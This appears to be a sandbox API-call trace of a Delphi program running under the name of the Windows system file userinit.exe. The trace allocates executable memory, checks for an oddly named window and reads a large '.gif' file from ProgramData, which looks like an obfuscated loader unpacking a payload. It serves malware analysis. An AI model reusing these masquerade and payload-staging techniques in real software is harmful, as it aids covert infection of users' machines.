[0177.727] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0177.727] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0177.727] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0177.727] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0177.727] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0177.727] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0177.727] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0177.727] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0177.727] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0177.728] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0177.728] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0177.728] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0177.728] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0177.728] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0177.728] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0177.728] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0177.728] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0177.728] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0177.728] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0177.728] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0177.728] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0177.728] LoadStringA (in: hInstance=0x400000, uID=0xff21, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0177.728] LoadStringA (in: hInstance=0x400000, uID=0xff20, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0177.728] LoadStringA (in: hInstance=0x400000, uID=0xff3f, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0177.728] LoadStringA (in: hInstance=0x400000, uID=0xff3e, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0177.728] LoadStringA (in: hInstance=0x400000, uID=0xff3d, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0177.728] LoadStringA (in: hInstance=0x400000, uID=0xff3c, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0177.728] LoadStringA (in: hInstance=0x400000, uID=0xff3b, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0177.728] LoadStringA (in: hInstance=0x400000, uID=0xff3a, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0177.728] LoadStringA (in: hInstance=0x400000, uID=0xff39, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0177.728] LoadStringA (in: hInstance=0x400000, uID=0xff38, lpBuffer=0x20f754, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0177.728] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0177.728] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0177.728] GetVersion () returned 0x1db10106
[0177.728] GetCurrentProcessId () returned 0x5cc
[0177.728] GlobalAddAtomA (lpString="Delphi000005CC") returned 0xc105
[0177.728] GetCurrentThreadId () returned 0x3d8
[0177.728] GlobalAddAtomA (lpString="ControlOfs00400000000003D8") returned 0xc104
[0177.728] RegisterClipboardFormatA (lpszFormat="ControlOfs00400000000003D8") returned 0xc182
[0177.729] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0177.729] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0177.729] GetSystemMetrics (nIndex=19) returned 1
[0177.734] GetSystemMetrics (nIndex=75) returned 1
[0177.734] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x541310, fWinIni=0x0 | out: pvParam=0x541310) returned 1
[0177.735] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0177.735] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0177.735] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x10022d
[0177.735] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0177.735] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0177.735] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0177.735] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0xd0229
[0177.735] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0xe021d
[0177.736] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0xe0219
[0177.736] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0xf0217
[0177.736] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0xe0215
[0177.736] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0xd01e3
[0177.736] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0177.736] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0177.736] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0177.737] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0177.737] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0177.737] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0177.737] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0177.737] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0177.737] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0177.737] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0177.737] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0177.737] GetDC (hWnd=0x0) returned 0xed010836
[0177.737] GetDeviceCaps (hdc=0xed010836, index=90) returned 96
[0177.737] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0177.737] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0177.737] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x444d6c, dwData=0x54155c) returned 1
[0177.737] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x20fabf, fWinIni=0x0 | out: pvParam=0x20fabf) returned 1
[0177.737] CreateFontIndirectA (lplf=0x20fabf) returned 0x320a0877
[0177.737] GetObjectA (in: h=0x320a0877, c=60, pv=0x20f8b0 | out: pv=0x20f8b0) returned 60
[0177.738] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x20f96b, fWinIni=0x0 | out: pvParam=0x20f96b) returned 1
[0177.738] CreateFontIndirectA (lplf=0x20fa47) returned 0x2f0a0867
[0177.738] GetObjectA (in: h=0x2f0a0867, c=60, pv=0x20f8b0 | out: pv=0x20f8b0) returned 60
[0177.738] CreateFontIndirectA (lplf=0x20fa0b) returned 0x6a0a085a
[0177.738] GetObjectA (in: h=0x6a0a085a, c=60, pv=0x20f8b0 | out: pv=0x20f8b0) returned 60
[0177.738] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x0
[0177.738] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x20fa1f, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0177.738] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x20fa1f | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0177.738] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0xd0000
[0177.739] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x20f9d4 | out: lpWndClass=0x20f9d4) returned 0
[0177.739] RegisterClassA (lpWndClass=0x451c88) returned 0x20c167
[0177.739] GetSystemMetrics (nIndex=0) returned 1440
[0177.739] GetSystemMetrics (nIndex=1) returned 900
[0177.739] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="userinit", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x1001e8
[0177.743] SetWindowLongA (hWnd=0x1001e8, nIndex=-4, dwNewLong=856047) returned 4219500
[0177.743] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0177.743] SendMessageA (hWnd=0x1001e8, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0177.743] DefWindowProcA (hWnd=0x1001e8, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0177.756] DefWindowProcA (hWnd=0x1001e8, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0xd01c1
[0177.757] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0177.757] SetClassLongA (hWnd=0x1001e8, nIndex=-14, dwNewLong=65575) returned 0x0
[0177.757] GetSystemMenu (hWnd=0x1001e8, bRevert=0) returned 0xf019d
[0177.759] DeleteMenu (hMenu=0xf019d, uPosition=0xf030, uFlags=0x0) returned 1
[0177.759] DeleteMenu (hMenu=0xf019d, uPosition=0xf000, uFlags=0x0) returned 1
[0177.759] DeleteMenu (hMenu=0xf019d, uPosition=0xf010, uFlags=0x0) returned 1
[0177.760] GetKeyboardLayoutList (in: nBuff=64, lpList=0x20f9a0 | out: lpList=0x20f9a0) returned 1
[0177.761] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0177.761] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0177.762] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6d7b0000
[0177.762] GetProcAddress (hModule=0x6d7b0000, lpProcName="InitializeFlatSB") returned 0x6d7e266f
[0177.762] GetProcAddress (hModule=0x6d7b0000, lpProcName="UninitializeFlatSB") returned 0x6d7e2542
[0177.762] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollProp") returned 0x6d7e1d29
[0177.762] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollProp") returned 0x6d7e238d
[0177.762] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6d7e20c9
[0177.762] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6d7e1fdb
[0177.762] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollRange") returned 0x6d7e1e8d
[0177.762] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6d7e1f0f
[0177.762] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollPos") returned 0x6d7e1ccd
[0177.762] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollPos") returned 0x6d7e216d
[0177.762] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6d7e22be
[0177.762] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollRange") returned 0x6d7e21e2
[0177.762] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0177.763] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0177.763] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0177.763] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0177.763] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0177.763] GetCurrentThreadId () returned 0x3d8
[0177.763] GlobalAddAtomA (lpString="WndProcPtr00400000000003D8") returned 0xc103
[0177.763] VirtualAlloc (lpAddress=0x544000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x544000
[0177.763] ShowWindow (hWnd=0x1001e8, nCmdShow=0) returned 0
[0177.764] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0177.764] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmg.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmg.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98
[0177.764] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x20f720*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x20f720*=0) returned 0x0
[0177.764] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x20f718*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x20f718*=0) returned 0x0
[0177.764] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x20f718*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x20f718*=0) returned 0x10be00
[0177.764] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x20f718*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x20f718*=0) returned 0x0
[0177.765] GlobalLock (hMem=0x140004) returned 0x2320020
[0177.765] ReadFile (in: hFile=0x98, lpBuffer=0x2320020, nNumberOfBytesToRead=0x10be00, lpNumberOfBytesRead=0x20f734, lpOverlapped=0x0 | out: lpBuffer=0x2320020*, lpNumberOfBytesRead=0x20f734*=0x10be00, lpOverlapped=0x0) returned 1
[0177.800] CloseHandle (hObject=0x98) returned 1
[0177.801] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.801] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.801] GlobalUnlock (hMem=0x14000c) returned 0
[0177.801] GlobalReAlloc (hMem=0x14000c, dwBytes=0x4000, uFlags=0x2) returned 0x14000c
[0177.802] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.803] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.803] GlobalUnlock (hMem=0x14000c) returned 0
[0177.803] GlobalReAlloc (hMem=0x14000c, dwBytes=0x6000, uFlags=0x2) returned 0x14000c
[0177.803] GlobalLock (hMem=0x14000c) returned 0x90a820
[0177.804] GlobalHandle (pMem=0x90a820) returned 0x14000c
[0177.804] GlobalUnlock (hMem=0x14000c) returned 0
[0177.804] GlobalReAlloc (hMem=0x14000c, dwBytes=0x8000, uFlags=0x2) returned 0x14000c
[0177.805] GlobalLock (hMem=0x14000c) returned 0x910830
[0177.805] GlobalHandle (pMem=0x910830) returned 0x14000c
[0177.805] GlobalUnlock (hMem=0x14000c) returned 0
[0177.805] GlobalReAlloc (hMem=0x14000c, dwBytes=0xa000, uFlags=0x2) returned 0x14000c
[0177.805] GlobalLock (hMem=0x14000c) returned 0x910830
[0177.806] GlobalHandle (pMem=0x910830) returned 0x14000c
[0177.806] GlobalUnlock (hMem=0x14000c) returned 0
[0177.806] GlobalReAlloc (hMem=0x14000c, dwBytes=0xc000, uFlags=0x2) returned 0x14000c
[0177.807] GlobalLock (hMem=0x14000c) returned 0x91a840
[0177.807] GlobalHandle (pMem=0x91a840) returned 0x14000c
[0177.807] GlobalUnlock (hMem=0x14000c) returned 0
[0177.807] GlobalReAlloc (hMem=0x14000c, dwBytes=0xe000, uFlags=0x2) returned 0x14000c
[0177.807] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.808] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.808] GlobalUnlock (hMem=0x14000c) returned 0
[0177.808] GlobalReAlloc (hMem=0x14000c, dwBytes=0x10000, uFlags=0x2) returned 0x14000c
[0177.808] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.809] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.809] GlobalUnlock (hMem=0x14000c) returned 0
[0177.809] GlobalReAlloc (hMem=0x14000c, dwBytes=0x12000, uFlags=0x2) returned 0x14000c
[0177.809] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.810] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.810] GlobalUnlock (hMem=0x14000c) returned 0
[0177.810] GlobalReAlloc (hMem=0x14000c, dwBytes=0x14000, uFlags=0x2) returned 0x14000c
[0177.810] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.810] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.810] GlobalUnlock (hMem=0x14000c) returned 0
[0177.810] GlobalReAlloc (hMem=0x14000c, dwBytes=0x16000, uFlags=0x2) returned 0x14000c
[0177.810] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.811] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.811] GlobalUnlock (hMem=0x14000c) returned 0
[0177.811] GlobalReAlloc (hMem=0x14000c, dwBytes=0x18000, uFlags=0x2) returned 0x14000c
[0177.811] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.812] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.812] GlobalUnlock (hMem=0x14000c) returned 0
[0177.812] GlobalReAlloc (hMem=0x14000c, dwBytes=0x1a000, uFlags=0x2) returned 0x14000c
[0177.812] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.813] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.813] GlobalUnlock (hMem=0x14000c) returned 0
[0177.813] GlobalReAlloc (hMem=0x14000c, dwBytes=0x1c000, uFlags=0x2) returned 0x14000c
[0177.813] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.813] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.813] GlobalUnlock (hMem=0x14000c) returned 0
[0177.813] GlobalReAlloc (hMem=0x14000c, dwBytes=0x1e000, uFlags=0x2) returned 0x14000c
[0177.813] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.814] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.814] GlobalUnlock (hMem=0x14000c) returned 0
[0177.814] GlobalReAlloc (hMem=0x14000c, dwBytes=0x20000, uFlags=0x2) returned 0x14000c
[0177.814] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.815] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.815] GlobalUnlock (hMem=0x14000c) returned 0
[0177.815] GlobalReAlloc (hMem=0x14000c, dwBytes=0x22000, uFlags=0x2) returned 0x14000c
[0177.816] GlobalLock (hMem=0x14000c) returned 0x926820
[0177.817] GlobalHandle (pMem=0x926820) returned 0x14000c
[0177.817] GlobalUnlock (hMem=0x14000c) returned 0
[0177.817] GlobalReAlloc (hMem=0x14000c, dwBytes=0x24000, uFlags=0x2) returned 0x14000c
[0177.817] GlobalLock (hMem=0x14000c) returned 0x926820
[0177.817] GlobalHandle (pMem=0x926820) returned 0x14000c
[0177.817] GlobalUnlock (hMem=0x14000c) returned 0
[0177.818] GlobalReAlloc (hMem=0x14000c, dwBytes=0x26000, uFlags=0x2) returned 0x14000c
[0177.819] GlobalLock (hMem=0x14000c) returned 0x94a830
[0177.820] GlobalHandle (pMem=0x94a830) returned 0x14000c
[0177.820] GlobalUnlock (hMem=0x14000c) returned 0
[0177.820] GlobalReAlloc (hMem=0x14000c, dwBytes=0x28000, uFlags=0x2) returned 0x14000c
[0177.820] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.820] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.821] GlobalUnlock (hMem=0x14000c) returned 0
[0177.821] GlobalReAlloc (hMem=0x14000c, dwBytes=0x2a000, uFlags=0x2) returned 0x14000c
[0177.821] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.821] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.821] GlobalUnlock (hMem=0x14000c) returned 0
[0177.821] GlobalReAlloc (hMem=0x14000c, dwBytes=0x2c000, uFlags=0x2) returned 0x14000c
[0177.821] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.822] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.822] GlobalUnlock (hMem=0x14000c) returned 0
[0177.822] GlobalReAlloc (hMem=0x14000c, dwBytes=0x2e000, uFlags=0x2) returned 0x14000c
[0177.822] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.823] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.823] GlobalUnlock (hMem=0x14000c) returned 0
[0177.823] GlobalReAlloc (hMem=0x14000c, dwBytes=0x30000, uFlags=0x2) returned 0x14000c
[0177.823] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.823] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.824] GlobalUnlock (hMem=0x14000c) returned 0
[0177.824] GlobalReAlloc (hMem=0x14000c, dwBytes=0x32000, uFlags=0x2) returned 0x14000c
[0177.824] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.824] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.824] GlobalUnlock (hMem=0x14000c) returned 0
[0177.824] GlobalReAlloc (hMem=0x14000c, dwBytes=0x34000, uFlags=0x2) returned 0x14000c
[0177.824] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.825] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.825] GlobalUnlock (hMem=0x14000c) returned 0
[0177.825] GlobalReAlloc (hMem=0x14000c, dwBytes=0x36000, uFlags=0x2) returned 0x14000c
[0177.825] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.826] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.826] GlobalUnlock (hMem=0x14000c) returned 0
[0177.826] GlobalReAlloc (hMem=0x14000c, dwBytes=0x38000, uFlags=0x2) returned 0x14000c
[0177.826] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.826] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.826] GlobalUnlock (hMem=0x14000c) returned 0
[0177.826] GlobalReAlloc (hMem=0x14000c, dwBytes=0x3a000, uFlags=0x2) returned 0x14000c
[0177.826] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.827] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.827] GlobalUnlock (hMem=0x14000c) returned 0
[0177.827] GlobalReAlloc (hMem=0x14000c, dwBytes=0x3c000, uFlags=0x2) returned 0x14000c
[0177.827] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.828] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.828] GlobalUnlock (hMem=0x14000c) returned 0
[0177.828] GlobalReAlloc (hMem=0x14000c, dwBytes=0x3e000, uFlags=0x2) returned 0x14000c
[0177.828] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.829] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.829] GlobalUnlock (hMem=0x14000c) returned 0
[0177.829] GlobalReAlloc (hMem=0x14000c, dwBytes=0x40000, uFlags=0x2) returned 0x14000c
[0177.829] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.830] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.830] GlobalUnlock (hMem=0x14000c) returned 0
[0177.830] GlobalReAlloc (hMem=0x14000c, dwBytes=0x42000, uFlags=0x2) returned 0x14000c
[0177.830] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.831] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.831] GlobalUnlock (hMem=0x14000c) returned 0
[0177.831] GlobalReAlloc (hMem=0x14000c, dwBytes=0x44000, uFlags=0x2) returned 0x14000c
[0177.831] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.831] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.831] GlobalUnlock (hMem=0x14000c) returned 0
[0177.831] GlobalReAlloc (hMem=0x14000c, dwBytes=0x46000, uFlags=0x2) returned 0x14000c
[0177.831] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.832] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.832] GlobalUnlock (hMem=0x14000c) returned 0
[0177.832] GlobalReAlloc (hMem=0x14000c, dwBytes=0x48000, uFlags=0x2) returned 0x14000c
[0177.832] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.833] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.833] GlobalUnlock (hMem=0x14000c) returned 0
[0177.833] GlobalReAlloc (hMem=0x14000c, dwBytes=0x4a000, uFlags=0x2) returned 0x14000c
[0177.833] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.834] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.834] GlobalUnlock (hMem=0x14000c) returned 0
[0177.834] GlobalReAlloc (hMem=0x14000c, dwBytes=0x4c000, uFlags=0x2) returned 0x14000c
[0177.834] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.834] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.834] GlobalUnlock (hMem=0x14000c) returned 0
[0177.834] GlobalReAlloc (hMem=0x14000c, dwBytes=0x4e000, uFlags=0x2) returned 0x14000c
[0177.835] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.835] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.835] GlobalUnlock (hMem=0x14000c) returned 0
[0177.835] GlobalReAlloc (hMem=0x14000c, dwBytes=0x50000, uFlags=0x2) returned 0x14000c
[0177.835] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.836] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.836] GlobalUnlock (hMem=0x14000c) returned 0
[0177.836] GlobalReAlloc (hMem=0x14000c, dwBytes=0x52000, uFlags=0x2) returned 0x14000c
[0177.836] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.837] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.837] GlobalUnlock (hMem=0x14000c) returned 0
[0177.837] GlobalReAlloc (hMem=0x14000c, dwBytes=0x54000, uFlags=0x2) returned 0x14000c
[0177.837] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.837] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.837] GlobalUnlock (hMem=0x14000c) returned 0
[0177.837] GlobalReAlloc (hMem=0x14000c, dwBytes=0x56000, uFlags=0x2) returned 0x14000c
[0177.837] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.838] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.838] GlobalUnlock (hMem=0x14000c) returned 0
[0177.838] GlobalReAlloc (hMem=0x14000c, dwBytes=0x58000, uFlags=0x2) returned 0x14000c
[0177.838] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.839] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.839] GlobalUnlock (hMem=0x14000c) returned 0
[0177.839] GlobalReAlloc (hMem=0x14000c, dwBytes=0x5a000, uFlags=0x2) returned 0x14000c
[0177.839] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.840] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.840] GlobalUnlock (hMem=0x14000c) returned 0
[0177.840] GlobalReAlloc (hMem=0x14000c, dwBytes=0x5c000, uFlags=0x2) returned 0x14000c
[0177.840] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.840] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.840] GlobalUnlock (hMem=0x14000c) returned 0
[0177.840] GlobalReAlloc (hMem=0x14000c, dwBytes=0x5e000, uFlags=0x2) returned 0x14000c
[0177.840] GlobalLock (hMem=0x14000c) returned 0x906810
[0177.841] GlobalHandle (pMem=0x906810) returned 0x14000c
[0177.841] GlobalUnlock (hMem=0x14000c) returned 0
[0177.841] GlobalReAlloc (hMem=0x14000c, dwBytes=0x60000, uFlags=0x2) returned 0x14000c
